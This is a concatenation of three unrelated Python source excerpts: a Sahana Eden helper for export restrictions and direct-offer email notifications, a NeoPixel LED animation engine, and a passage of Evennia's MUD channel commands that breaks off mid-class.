        values = [item for item in value if item is not None]
        if not values:
            return ""

        default = self.default
        if show_link:
            # links must keep their bulk()-order, so no sorting here
            repr_items = (labels[item] if item in labels else default
                          for item in values)
        else:
            repr_items = sorted(s3_str(labels[item]) if item in labels else default
                                for item in values)

        if current.auth.permission.format == "xls":
            # plain comma-separated string for spreadsheet export
            return ", ".join(repr_items)

        item_list = UL(_class="service-list")
        for item in repr_items:
            item_list.append(LI(item))
        return item_list
# =============================================================================
def restrict_data_formats(r):
    """
    Restrict data exports (prevent S3XML/S3JSON of records)

    @param r: the S3Request
    """

    settings = current.deployment_settings

    allowed = ["html", "iframe", "popup", "aadata", "plain", "geojson", "pdf", "xls"]
    if r.method in ("report", "timeplot", "filter"):
        # interactive reports/filters need JSON
        allowed.append("json")
    if r.method == "options":
        # option lookups use S3JSON
        allowed.append("s3json")

    settings.ui.export_formats = ("pdf", "xls")

    if r.representation not in allowed:
        r.error(403, current.ERROR.NOT_PERMITTED)
# =============================================================================
def notify_direct_offer(record_id):
    """
    Send notification to activity manager about a direct offer

    @param record_id: the direct offer record ID

    @returns: error message if failed, otherwise None

    Only sends a notification when the direct offer is flagged for
    notification and has not been notified before, the case activity
    is still open, and the offer is neither blocked nor expired.
    """

    T = current.T

    db = current.db
    s3db = current.s3db

    table = s3db.br_direct_offer

    today = current.request.utcnow.date()

    # Look up the direct offer together with its case activity and offer
    # - join conditions exclude closed activities and blocked/expired offers
    atable = s3db.br_case_activity
    stable = s3db.br_case_activity_status
    aotable = s3db.br_assistance_offer
    join = [atable.on((atable.id == table.case_activity_id) & \
                      (atable.deleted == False)),
            stable.on((stable.id == atable.status_id) & \
                      (stable.is_closed == False)),
            aotable.on((aotable.id == table.offer_id) & \
                       (aotable.status != "BLC") & \
                       ((aotable.end_date == None) | (aotable.end_date >= today)) & \
                       (aotable.deleted == False)),
            ]
    query = (table.id == record_id) & \
            (table.notify == True) & \
            (table.notified_on == None) & \
            (table.deleted == False)
    row = db(query).select(table.id,
                           table.case_activity_id,
                           table.offer_id,
                           atable.person_id,
                           atable.subject,
                           join = join,
                           limitby = (0, 1),
                           ).first()
    if not row:
        # Nothing to notify (already notified, or not notifiable)
        return None

    direct_offer = row.br_direct_offer
    case_activity = row.br_case_activity

    # Determine recipient
    # - prefer the client's own user account email, fall back to the
    #   responsible roles of the case organisation
    recipient = None

    user_id = current.auth.s3_get_user_id(case_activity.person_id)
    if user_id:
        # Look up the user's email address
        ltable = s3db.pr_person_user
        ctable = s3db.pr_contact
        join = ctable.on((ctable.pe_id == ltable.pe_id) & \
                         (ctable.contact_method == "EMAIL") & \
                         (ctable.deleted == False))
        query = (ltable.user_id == user_id) & \
                (ltable.deleted == False)
        row = db(query).select(ctable.value,
                               join = join,
                               orderby = ctable.priority,
                               limitby = (0, 1),
                               ).first()
        if row:
            recipient = row.value
    else:
        # Look up the case org
        ctable = s3db.br_case
        query = (ctable.person_id == case_activity.person_id) & \
                (ctable.deleted == False)
        row = db(query).select(ctable.organisation_id,
                               limitby = (0, 1),
                               ).first()
        if row:
            organisation_id = row.organisation_id
        else:
            return T("Case Organisation not found")

        # Look up the email addresses of CASE_MANAGERs
        from templates.RLPPTM.helpers import get_role_emails
        recipient = get_role_emails("CASE_MANAGER",
                                    organisation_id = organisation_id,
                                    )
        if not recipient:
            # Fall back
            recipient = get_role_emails("RELIEF_PROVIDER",
                                        organisation_id = organisation_id,
                                        )

    if not recipient:
        return T("No suitable recipient for notification found")
    if isinstance(recipient, list) and len(recipient) == 1:
        recipient = recipient[0]

    # Lookup data for notification
    ltable = s3db.gis_location
    left = ltable.on(ltable.id == aotable.location_id)
    query = (aotable.id == direct_offer.offer_id)
    row = db(query).select(aotable.id,
                           aotable.pe_id,
                           aotable.refno,
                           aotable.name,
                           aotable.description,
                           aotable.chargeable,
                           aotable.contact_name,
                           aotable.contact_phone,
                           aotable.contact_email,
                           aotable.date,
                           aotable.end_date,
                           aotable.availability,
                           ltable.id,
                           ltable.L3,
                           ltable.L1,
                           left = left,
                           limitby = (0, 1),
                           ).first()
    offer = row.br_assistance_offer
    location = row.gis_location

    provider = ProviderRepresent(as_string=True)(offer.pe_id)
    availability_opts = dict(s3db.br_assistance_offer_availability)
    availability = availability_opts.get(offer.availability, "-")

    public_url = current.deployment_settings.get_base_public_url()
    appname = current.request.application
    base_url = "%s/%s" % (public_url, appname)

    # Substitution data for the notification template
    data = {"provider": s3_str(provider),
            "title": offer.name,
            "details": offer.description,
            "refno": offer.refno,
            "name": offer.contact_name,
            "phone": offer.contact_phone,
            "email": offer.contact_email,
            "chargeable": s3_yes_no_represent(offer.chargeable),
            "available_from": aotable.date.represent(offer.date),
            "available_until": aotable.end_date.represent(offer.end_date),
            "availability": s3_str(availability),
            "offer_url": "%s/br/offers/%s" % (base_url, direct_offer.offer_id),
            "need_url": "%s/br/case_activity/%s" % (base_url, direct_offer.case_activity_id),
            "subject": case_activity.subject,
            }
    if location.id:
        data["place"] = "%s (%s)" % (location.L3 or "-",
                                     location.L1 or "-",
                                     )

    # Send notification
    from templates.RLPPTM.notifications import CMSNotifications
    error = CMSNotifications.send(recipient,
                                  "DirectOfferNotification",
                                  data,
                                  module = "br",
                                  resource = "direct_offer",
                                  )
    if not error:
        # Set notified_on
        # - BUGFIX: utcnow must be called; previously the function object
        #   itself was passed, so no valid timestamp was ever stored
        # - passing the Field objects for modified_on/modified_by keeps
        #   those columns unchanged by this system update
        direct_offer.update_record(notified_on = datetime.datetime.utcnow(),
                                   modified_on = table.modified_on,
                                   modified_by = table.modified_by,
                                   )
    return error
# END =========================================================================
| |
import time
import random
import threading
from neopixel import *
from conf import *
def getRandomColor(colorsList):
    """Returns a random color from <colorsList>, or OFF (0, 0, 0) if the list is empty"""
    if colorsList:
        # random.choice is the idiomatic (and equivalent) way to pick
        # a uniformly random element
        return random.choice(colorsList)
    return 0, 0, 0
def getDimmedRGB(color, alpha=255):
    """Returns dimmed RGB values, with low and high pass to ensure LEDs are fully off or on"""
    # snap near-maximum alpha to fully on, near-zero to fully off
    if alpha >= 253:  # int is 1
        return color
    if alpha <= 2:  # int is 0
        return 0, 0, 0
    factor = alpha / 255.0
    r, g, b = color
    return int(r * factor), int(g * factor), int(b * factor)
class NeoPixelEngine:
    """Pushes animations to hardware NeoPixel array based on the number of tweets & special tweets found"""
    def __init__(self):
        # LED_* constants and POLL_FREQUENCY come from conf (star-imported
        # at module level); Adafruit_NeoPixel from the neopixel library
        print("[!] Starting NeoPixel Engine ...")
        random.seed(time.time())
        # Set up Neopixel Strip
        self.strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS)
        self.strip.begin()
        # start refresh Thread
        # - a daemon thread that periodically pushes the pixel buffer to the
        #   hardware (see refreshStrip); all animation methods only write
        #   into the buffer via setPixelColorRGB
        self.refresh = threading.Thread(target=self.refreshStrip, args=(1.0/LED_UPDATE_FREQ,))
        self.refresh.setDaemon(True)
        self.isAlive = True
        self.refresh.start()
    def stop(self):
        # Signal the refresh thread to stop and wait for it to finish;
        # the thread blanks all pixels on its way out (see refreshStrip)
        self.isAlive = False
        self.refresh.join()
    def animate(self, tweets, specials):
        """Wrapper for Animate thread handler"""
        random.seed(time.time())
        # run asynchronously so the caller (e.g. the poller) is not blocked
        threading.Thread(target=self.animateThread, args=(tweets, specials,)).start()
    def animateThread(self, tweets, specials):
        """Chooses how to animate the hardware array, based on the number of tweets and special tweets"""
        # special tweets take precedence over the regular count
        if specials > 0:
            # Special tweet found
            self.whiteTwinkle()
        elif tweets >= 0:
            # the tweets-to-LEDs ratio selects the animation intensity
            if (float(tweets)/LED_COUNT) > 0.9:
                # Almost saturated
                self.pickRandomSpecialAnimation()
            elif (float(tweets)/LED_COUNT) < 0.1:
                # Hardly any
                self.pickRandomGlow()
            else:
                # Moderate amount
                self.flashRandom(tweets)
    ## ---- Animations -------------------------------------------------------------------------------------------------
    def pickRandomSpecialAnimation(self):
        # Run one randomly chosen "special" (high-activity) animation
        random.seed(time.time())
        random.choice([
            self.solidColorWipe,
            self.randomColorWipe,
            self.solidColorTwinkle,
            self.randomColorTwinkle,
            self.solidColorLadder,
            self.randomColorLadder,
            self.candyCane
        ])()
    def pickRandomGlow(self):
        # Run one randomly chosen glow animation at low intensity (15/255)
        random.seed(time.time())
        random.choice([
            self.solidColorGlow,
            self.randomColorGlow
        ])(15)
    def showcaseAnimations(self):
        """Runs through all the animations in the class, for test & showcase"""
        # sleeps between animations let the previous flash threads finish
        self.flashRandom(LED_COUNT)
        self.solidColorWipe()
        time.sleep(POLL_FREQUENCY/2)
        self.randomColorWipe()
        time.sleep(POLL_FREQUENCY/2)
        self.solidColorTwinkle()
        self.whiteTwinkle()
        self.randomColorTwinkle()
        self.solidColorGlow(25)
        time.sleep(POLL_FREQUENCY)
        self.randomColorGlow(25)
        time.sleep(POLL_FREQUENCY)
        self.solidColorLadder()
        self.randomColorLadder()
        self.candyCane()
        time.sleep(POLL_FREQUENCY/2)
    def flashRandom(self, number):
        """Flashes <number> random pixels a random color from SUCCESS_COLORS"""
        # spread <number> flashes evenly over one polling interval
        wait_s = float(POLL_FREQUENCY) / number
        hold = min(wait_s, 1.0)
        addrs = random.sample(range(0, LED_COUNT), number)
        for i in range(0, number):
            # only start a flash if it can complete within the polling window
            if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
                self.flash([addrs[i]], getRandomColor(SUCCESS_COLORS), hold=hold)
            time.sleep(wait_s)
    def solidColorWipe(self):
        """Wipes the same random color from SUCCESS_COLORS up the array"""
        color = getRandomColor(SUCCESS_COLORS)
        wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
        hold = (POLL_FREQUENCY * 0.5)
        for i in range(0, LED_COUNT):
            # overlapping flash threads create the wipe effect
            self.flash([i], color, fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
            time.sleep(wait_s)
    def randomColorWipe(self):
        """Wipes random colors from SUCCESS_COLORS up the array"""
        wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
        hold = float(POLL_FREQUENCY * 0.5)
        for i in range(0, LED_COUNT):
            self.flash([i], getRandomColor(SUCCESS_COLORS), fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
            time.sleep(wait_s)
    def solidColorTwinkle(self):
        """Twinkles the whole strip, all the same random color from SUCCESS_COLORS"""
        color = getRandomColor(SUCCESS_COLORS)
        wait_s = float(POLL_FREQUENCY) / LED_COUNT
        hold = min(wait_s, 1.0)
        # one shuffled address list repeated 4x: each iteration flashes a
        # group of 4 pixels, and each pixel twinkles 4 times in total
        addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
        for i in range(0, LED_COUNT):
            if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
                self.flash(addrs[(4 * i):(4 * i) + 4], color, hold=hold)
            time.sleep(wait_s)
    def whiteTwinkle(self):
        """Twinkles the whole strip white"""
        wait_s = float(POLL_FREQUENCY) / LED_COUNT
        hold = min(wait_s, 1.0)
        # same 4x-group scheme as solidColorTwinkle
        addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
        for i in range(0, LED_COUNT):
            if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
                self.flash(addrs[(4 * i):(4 * i) + 4], (255, 255, 255), hold=hold)
            time.sleep(wait_s)
    def randomColorTwinkle(self):
        """Twinkles the whole strip, each pixel a random color from SUCCESS_COLORS"""
        wait_s = float(POLL_FREQUENCY) / LED_COUNT
        hold = min(wait_s, 1.0)
        addrs = random.sample(range(0, LED_COUNT), LED_COUNT) * 4
        for i in range(0, LED_COUNT):
            if (((i+1)*hold)+0.5) <= POLL_FREQUENCY: # SO led don't overextend
                self.flash(addrs[(4 * i):(4 * i) + 4], getRandomColor(SUCCESS_COLORS), hold=hold)
            time.sleep(wait_s)
    def solidColorGlow(self, intensity):
        """Turns whole strip on at <intensity> brightness, all the same random color from SUCCESS_COLORS"""
        color = getDimmedRGB(getRandomColor(SUCCESS_COLORS), intensity)
        self.flash(range(0,LED_COUNT), color, fade_in=(0.2*POLL_FREQUENCY), hold=(0.6*POLL_FREQUENCY), fade_out=(0.2*POLL_FREQUENCY))
    def randomColorGlow(self, intensity):
        """Turns whole strip on at <intensity> brightness, each pixel a random color from SUCCESS_COLORS"""
        for led in range(0, LED_COUNT):
            color = getDimmedRGB(getRandomColor(SUCCESS_COLORS), intensity)
            self.flash([led], color, fade_in=(0.2*POLL_FREQUENCY), hold=(0.6*POLL_FREQUENCY), fade_out=(0.2*POLL_FREQUENCY))
    def solidColorLadder(self):
        """Flashes a random color from SUCCESS_COLORS up the array, stepping up regular intervals"""
        color = getRandomColor(SUCCESS_COLORS)
        # base rungs: every int(POLL_FREQUENCY)-th pixel; each outer step
        # shifts the whole ladder up by one pixel
        ledList = [l for l in range(0, LED_COUNT-int(POLL_FREQUENCY)+1) if (l % int(POLL_FREQUENCY) == 0)]
        for i in range(0, int(POLL_FREQUENCY)):
            for addr in ledList:
                self.flash([addr+i], color, hold=0.5)
            time.sleep(1)
    def randomColorLadder(self):
        """Flashes random colors from SUCCESS_COLORS up the array, stepping up regular intervals"""
        ledList = [l for l in range(0, LED_COUNT-int(POLL_FREQUENCY)+1) if (l % int(POLL_FREQUENCY) == 0)]
        for i in range(0, int(POLL_FREQUENCY)):
            for addr in ledList:
                self.flash([addr+i], getRandomColor(SUCCESS_COLORS), hold=0.5)
            time.sleep(1)
    def candyCane(self):
        """Pushes red and white stripes up the array"""
        # stripe width: a fifth of the strip; color toggles at each boundary
        color_div = int(LED_COUNT / 5)
        color = (255, 0, 0)
        wait_s = float(POLL_FREQUENCY / (LED_COUNT * 2.0))
        hold = float(POLL_FREQUENCY * 0.5)
        for i in range(0, LED_COUNT):
            if (i % color_div) == 0:
                if color == (255, 0, 0):
                    color = (255, 255, 255)
                else:
                    color = (255, 0, 0)
            self.flash([i], color, fade_in=(0.2*hold), hold=(0.6*hold), fade_out=(0.2*hold))
            time.sleep(wait_s)
    ## ---- Pixel Threads ----------------------------------------------------------------------------------------------
    def flash(self, addrs, color, fade_in=0.25, hold=0.0, fade_out=0.25):
        """Wrapper for Flash thread handler"""
        # each flash runs in its own thread so multiple flashes can overlap
        threading.Thread(target=self.flashThread, args=(addrs, color, fade_in, hold, fade_out,)).start()
    def flashThread(self, addrs, color, fade_in=0.25, hold=0.0, fade_out=0.25):
        """Flashes all pixels in <addrs> with <color>, run as a thread"""
        # fade in period
        # - ramp alpha from 0 to 255 in LED_FADE_STEP steps; this only writes
        #   the pixel buffer, the refresh thread pushes it to hardware
        wait_s = (fade_in / LED_FADE_STEP)
        alpha_mult = (255.0 / LED_FADE_STEP)
        for i in range(0, LED_FADE_STEP):
            for pixel in addrs:
                c = getDimmedRGB(color, alpha=((i+1)*alpha_mult))
                self.strip.setPixelColorRGB(pixel, *c)
            time.sleep(wait_s)
        if hold > 0:
            time.sleep(hold)
        # fade out period
        # - same ramp in reverse, ending at alpha 0 (pixel off)
        wait_s = (fade_out / LED_FADE_STEP)
        for i in range(LED_FADE_STEP, 0, -1):
            for pixel in addrs:
                c = getDimmedRGB(color, alpha=((i-1)*alpha_mult))
                self.strip.setPixelColorRGB(pixel, *c)
            time.sleep(wait_s)
    def refreshStrip(self, update_sleep):
        """LED_UPDATE_FREQ times per second the colors are sent to the NeoPixel Hardware Array"""
        while self.isAlive:
            self.strip.show()
            time.sleep(update_sleep)
        # Make sure to turn them off at the end
        for i in range(0, LED_COUNT):
            self.strip.setPixelColorRGB(i, 0, 0, 0)
        self.strip.show()
| |
"""
Comsystem command module.
Comm commands are OOC commands and intended to be made available to
the Account at all times (they go into the AccountCmdSet). So we
make sure to homogenize self.caller to always be the account object
for easy handling.
"""
from past.builtins import cmp
from django.conf import settings
from evennia.comms.models import ChannelDB, Msg
from evennia.accounts.models import AccountDB
from evennia.accounts import bots
from evennia.comms.channelhandler import CHANNELHANDLER
from evennia.locks.lockhandler import LockException
from evennia.utils import create, utils, evtable
from evennia.utils.utils import make_iter, class_from_module
COMMAND_DEFAULT_CLASS = class_from_module(settings.COMMAND_DEFAULT_CLASS)
# limit symbol import for API
__all__ = ("CmdAddCom", "CmdDelCom", "CmdAllCom",
"CmdChannels", "CmdCdestroy", "CmdCBoot", "CmdCemit",
"CmdCWho", "CmdChannelCreate", "CmdClock", "CmdCdesc",
"CmdPage", "CmdIRC2Chan", "CmdRSS2Chan")
_DEFAULT_WIDTH = settings.CLIENT_DEFAULT_WIDTH
def find_channel(caller, channelname, silent=False, noaliases=False):
    """
    Helper function for searching for a single channel with
    some error handling.
    """
    matches = ChannelDB.objects.channel_search(channelname)

    if not matches:
        # no direct key match - fall back to alias lookup unless disabled
        if not noaliases:
            matches = [chan for chan in ChannelDB.objects.get_all_channels()
                       if channelname in chan.aliases.all()]
        if matches:
            return matches[0]
        if not silent:
            caller.msg("Channel '%s' not found." % channelname)
        return None

    if len(matches) > 1:
        # ambiguous - report all candidates instead of picking one
        matchstring = ", ".join("%s(%s)" % (chan.key, chan.id) for chan in matches)
        if not silent:
            caller.msg("Multiple channels match (be more specific): \n%s" % matchstring)
        return None

    return matches[0]
class CmdAddCom(COMMAND_DEFAULT_CLASS):
    """
    add a channel alias and/or subscribe to a channel

    Usage:
       addcom [alias=] <channel>

    Joins a given channel. If alias is given, this will allow you to
    refer to the channel by this alias rather than the full channel
    name. Subsequent calls of this command can be used to add multiple
    aliases to an already joined channel.
    """

    key = "addcom"
    aliases = ["aliaschan", "chanalias"]
    help_category = "Comms"
    locks = "cmd:not pperm(channel_banned)"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Implement the command"""

        caller = self.caller
        account = caller

        if not self.args:
            self.msg("Usage: addcom [alias =] channelname.")
            return

        if self.rhs:
            # rhs holds the channelname
            channelname, alias = self.rhs, self.lhs
        else:
            channelname, alias = self.args, None

        channel = find_channel(caller, channelname)
        if not channel:
            # find_channel has already reported the error
            return

        # check permissions
        if not channel.access(account, 'listen'):
            self.msg("%s: You are not allowed to listen to this channel." % channel.key)
            return

        string = ""
        if channel.has_connection(account):
            # already connected - just unmute if muted
            if channel.unmute(account):
                string += "You unmute channel %s." % channel.key
            else:
                string += "You are already connected to channel %s." % channel.key
        else:
            # we want to connect as well.
            if not channel.connect(account):
                # if this would have returned True, the account is connected
                self.msg("%s: You are not allowed to join this channel." % channel.key)
                return
            string += "You now listen to the channel %s. " % channel.key

        if alias:
            # create a nick and add it to the caller.
            caller.nicks.add(alias, channel.key, category="channel")
            string += " You can now refer to the channel %s with the alias '%s'."
            self.msg(string % (channel.key, alias))
        else:
            string += " No alias added."
            self.msg(string)
class CmdDelCom(COMMAND_DEFAULT_CLASS):
    """
    remove a channel alias and/or unsubscribe from channel

    Usage:
       delcom <alias or channel>
       delcom/all <channel>

    If the full channel name is given, unsubscribe from the
    channel. If an alias is given, remove the alias but don't
    unsubscribe. If the 'all' switch is used, remove all aliases
    for that channel.
    """

    key = "delcom"
    aliases = ["delaliaschan", "delchanalias"]
    help_category = "Comms"
    locks = "cmd:not perm(channel_banned)"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Implementing the command. """

        caller = self.caller
        account = caller

        if not self.args:
            self.msg("Usage: delcom <alias or channel>")
            return
        ostring = self.args.lower()

        # first try to interpret the argument as a full channel name
        # (noaliases=True so an alias does not accidentally match here)
        channel = find_channel(caller, ostring, silent=True, noaliases=True)
        if channel:
            # we have given a channel name - unsubscribe
            if not channel.has_connection(account):
                self.msg("You are not listening to that channel.")
                return
            chkey = channel.key.lower()
            delnicks = "all" in self.switches
            # find all nicks linked to this channel and delete them
            # NOTE(review): nick.value[3] appears to hold the nick's target
            # channel key - confirm against the NickHandler storage format
            if delnicks:
                for nick in [nick for nick in make_iter(caller.nicks.get(category="channel", return_obj=True))
                             if nick and nick.pk and nick.value[3].lower() == chkey]:
                    nick.delete()
            disconnect = channel.disconnect(account)
            if disconnect:
                wipednicks = " Eventual aliases were removed." if delnicks else ""
                self.msg("You stop listening to channel '%s'.%s" % (channel.key, wipednicks))
            return
        else:
            # we are removing a channel nick
            channame = caller.nicks.get(key=ostring, category="channel")
            channel = find_channel(caller, channame, silent=True)
            if not channel:
                self.msg("No channel with alias '%s' was found." % ostring)
            else:
                if caller.nicks.get(ostring, category="channel"):
                    # remove the alias but stay subscribed to the channel
                    caller.nicks.remove(ostring, category="channel")
                    self.msg("Your alias '%s' for channel %s was cleared." % (ostring, channel.key))
                else:
                    self.msg("You had no such alias defined for this channel.")
class CmdAllCom(COMMAND_DEFAULT_CLASS):
    """
    perform admin operations on all channels

    Usage:
      allcom [on | off | who | destroy]

    Allows the user to universally turn off or on all channels they are on,
    as well as perform a 'who' for all channels they are on. Destroy deletes
    all channels that you control.

    Without argument, works like comlist.
    """

    key = "allcom"
    locks = "cmd: not pperm(channel_banned)"
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Runs the function"""

        caller = self.caller
        args = self.args
        if not args:
            # no argument - show the channel listing plus a usage hint
            self.execute_cmd("@channels")
            self.msg("(Usage: allcom on | off | who | destroy)")
            return

        if args == "on":
            # get names of all channels available to listen to
            # and activate them all
            channels = [chan for chan in ChannelDB.objects.get_all_channels()
                        if chan.access(caller, 'listen')]
            for channel in channels:
                self.execute_cmd("addcom %s" % channel.key)
        elif args == "off":
            # get names all subscribed channels and disconnect from them all
            channels = ChannelDB.objects.get_subscriptions(caller)
            for channel in channels:
                self.execute_cmd("delcom %s" % channel.key)
        elif args == "destroy":
            # destroy all channels you control
            channels = [chan for chan in ChannelDB.objects.get_all_channels()
                        if chan.access(caller, 'control')]
            for channel in channels:
                self.execute_cmd("@cdestroy %s" % channel.key)
        elif args == "who":
            # run a who, listing the subscribers on visible channels.
            string = "\n|CChannel subscriptions|n"
            channels = [chan for chan in ChannelDB.objects.get_all_channels()
                        if chan.access(caller, 'listen')]
            if not channels:
                string += "No channels."
            for channel in channels:
                string += "\n|w%s:|n\n %s" % (channel.key, channel.wholist)
            self.msg(string.strip())
        else:
            # wrong input
            # BUGFIX: the usage message previously advertised a non-existent
            # "clear" switch; the supported switches are on|off|who|destroy
            self.msg("Usage: allcom on | off | who | destroy")
class CmdChannels(COMMAND_DEFAULT_CLASS):
    """
    list all channels available to you

    Usage:
      @channels
      @clist
      comlist

    Lists all channels available to you, whether you listen to them or not.
    Use 'comlist' to only view your current channel subscriptions.
    Use addcom/delcom to join and leave channels
    """
    key = "@channels"
    aliases = ["@clist", "comlist", "chanlist", "channellist", "all channels"]
    help_category = "Comms"
    locks = "cmd: not pperm(channel_banned)"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Implement function"""

        caller = self.caller

        # all channels we have available to listen to
        channels = [chan for chan in ChannelDB.objects.get_all_channels()
                    if chan.access(caller, 'listen')]
        if not channels:
            self.msg("No channels available.")
            return
        # all channel we are already subscribed to
        subs = ChannelDB.objects.get_subscriptions(caller)

        # behavior depends on which alias invoked the command
        if self.cmdstring == "comlist":
            # just display the subscribed channels with no extra info
            comtable = evtable.EvTable("|wchannel|n", "|wmy aliases|n",
                                       "|wdescription|n", align="l", maxwidth=_DEFAULT_WIDTH)
            for chan in subs:
                clower = chan.key.lower()
                # NOTE(review): nicks lookup is loop-invariant and could be
                # hoisted; nick.value[3] appears to be the nick's target
                # channel key - confirm against the NickHandler format
                nicks = caller.nicks.get(category="channel", return_obj=True)
                # "X and Y or Z" idiom: append "(aliases)" only if any exist
                comtable.add_row(*["%s%s" % (chan.key, chan.aliases.all() and
                                  "(%s)" % ",".join(chan.aliases.all()) or ""),
                                   "%s" % ",".join(nick.db_key for nick in make_iter(nicks)
                                                   if nick and nick.value[3].lower() == clower),
                                   chan.db.desc])
            self.msg("\n|wChannel subscriptions|n (use |w@channels|n to list all,"
                     " |waddcom|n/|wdelcom|n to sub/unsub):|n\n%s" % comtable)
        else:
            # full listing (of channels caller is able to listen to)
            comtable = evtable.EvTable("|wsub|n", "|wchannel|n", "|wmy aliases|n",
                                       "|wlocks|n", "|wdescription|n", maxwidth=_DEFAULT_WIDTH)
            for chan in channels:
                clower = chan.key.lower()
                nicks = caller.nicks.get(category="channel", return_obj=True)
                nicks = nicks or []
                # subscription status column: No / Muted / Yes
                if chan not in subs:
                    substatus = "|rNo|n"
                elif caller in chan.mutelist:
                    substatus = "|rMuted|n"
                else:
                    substatus = "|gYes|n"
                comtable.add_row(*[substatus,
                                   "%s%s" % (chan.key, chan.aliases.all() and
                                   "(%s)" % ",".join(chan.aliases.all()) or ""),
                                   "%s" % ",".join(nick.db_key for nick in make_iter(nicks)
                                                   if nick.value[3].lower() == clower),
                                   str(chan.locks),
                                   chan.db.desc])
            comtable.reformat_column(0, width=9)
            comtable.reformat_column(3, width=14)
            self.msg("\n|wAvailable channels|n (use |wcomlist|n,|waddcom|n and |wdelcom|n"
                     " to manage subscriptions):\n%s" % comtable)
class CmdCdestroy(COMMAND_DEFAULT_CLASS):
    """
    destroy a channel you created

    Usage:
      @cdestroy <channel>

    Destroys a channel that you control.
    """

    key = "@cdestroy"
    help_category = "Comms"
    locks = "cmd: not pperm(channel_banned)"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Destroy objects cleanly."""

        caller = self.caller

        if not self.args:
            self.msg("Usage: @cdestroy <channelname>")
            return

        channel = find_channel(caller, self.args)
        if not channel:
            self.msg("Could not find channel %s." % self.args)
            return
        if not channel.access(caller, 'control'):
            self.msg("You are not allowed to do that.")
            return

        channel_key = channel.key
        # announce the destruction on the channel before it disappears
        message = "%s is being destroyed. Make sure to change your aliases." % channel_key
        channel.msg(create.create_message(caller, message, channel))
        channel.delete()
        CHANNELHANDLER.update()
        self.msg("Channel '%s' was destroyed." % channel_key)
class CmdCBoot(COMMAND_DEFAULT_CLASS):
    """
    kick an account from a channel you control

    Usage:
       @cboot[/quiet] <channel> = <account> [:reason]

    Switches:
       quiet - don't notify the channel

    Kicks an account or object from a channel you control.
    """

    key = "@cboot"
    locks = "cmd: not pperm(channel_banned)"
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """implement the function"""

        if not self.args or not self.rhs:
            string = "Usage: @cboot[/quiet] <channel> = <account> [:reason]"
            self.msg(string)
            return

        channel = find_channel(self.caller, self.lhs)
        if not channel:
            return
        reason = ""
        if ":" in self.rhs:
            # split off an optional ":reason" suffix
            accountname, reason = self.rhs.rsplit(":", 1)
            searchstring = accountname.lstrip('*')
        else:
            searchstring = self.rhs.lstrip('*')
        account = self.caller.search(searchstring, account=True)
        if not account:
            return
        if reason:
            reason = " (reason: %s)" % reason
        if not channel.access(self.caller, "control"):
            string = "You don't control this channel."
            self.msg(string)
            return
        if account not in channel.db_subscriptions.all():
            string = "Account %s is not connected to channel %s." % (account.key, channel.key)
            self.msg(string)
            return
        if "quiet" not in self.switches:
            string = "%s boots %s from channel.%s" % (self.caller, account.key, reason)
            channel.msg(string)
        # find all account's nicks linked to this channel and delete them
        # BUGFIX: lowercase both sides of the comparison - previously the
        # raw channel.key was compared against the lowercased nick value,
        # so aliases were never cleared for mixed-case channel keys
        # NOTE(review): account.character may be None for accounts without
        # a puppet - confirm whether this needs a guard
        chkey = channel.key.lower()
        for nick in [nick for nick in
                     account.character.nicks.get(category="channel") or []
                     if nick.value[3].lower() == chkey]:
            nick.delete()
        # disconnect account
        channel.disconnect(account)
        CHANNELHANDLER.update()
class CmdCemit(COMMAND_DEFAULT_CLASS):
    """
    send an admin message to a channel you control

    Usage:
      @cemit[/switches] <channel> = <message>

    Switches:
      sendername - attach the sender's name before the message
      quiet - don't echo the message back to sender

    Allows the user to broadcast a message over a channel as long as
    they control it. It does not show the user's name unless they
    provide the /sendername switch.
    """

    key = "@cemit"
    aliases = ["@cmsg"]
    locks = "cmd: not pperm(channel_banned) and pperm(Player)"
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """Implement function"""

        if not self.args or not self.rhs:
            self.msg("Usage: @cemit[/switches] <channel> = <message>")
            return

        channel = find_channel(self.caller, self.lhs)
        if not channel:
            return
        if not channel.access(self.caller, "control"):
            self.msg("You don't control this channel.")
            return

        message = self.rhs
        if "sendername" in self.switches:
            # prepend the sender's key
            message = "%s: %s" % (self.caller.key, message)
        channel.msg(message)

        if "quiet" not in self.switches:
            self.msg("Sent to channel %s: %s" % (channel.key, message))
class CmdCWho(COMMAND_DEFAULT_CLASS):
    """
    show who is listening to a channel

    Usage:
      @cwho <channel>

    List who is connected to a given channel you have access to.
    """
    key = "@cwho"
    locks = "cmd: not pperm(channel_banned)"
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
    account_caller = True

    def func(self):
        """implement function"""

        if not self.args:
            self.msg("Usage: @cwho <channel>")
            return

        channel = find_channel(self.caller, self.lhs)
        if not channel:
            return
        if not channel.access(self.caller, "listen"):
            self.msg("You can't access this channel.")
            return

        header = "\n|CChannel subscriptions|n"
        body = "\n|w%s:|n\n %s" % (channel.key, channel.wholist)
        self.msg((header + body).strip())
class CmdChannelCreate(COMMAND_DEFAULT_CLASS):
    """
    create a new channel

    Usage:
     @ccreate <new channel>[;alias;alias...] = description

    Creates a new channel owned by you.
    """

    key = "@ccreate"
    aliases = "channelcreate"
    locks = "cmd:not pperm(channel_banned) and pperm(Player)"
    help_category = "Comms"

    # this is used by the COMMAND_DEFAULT_CLASS parent
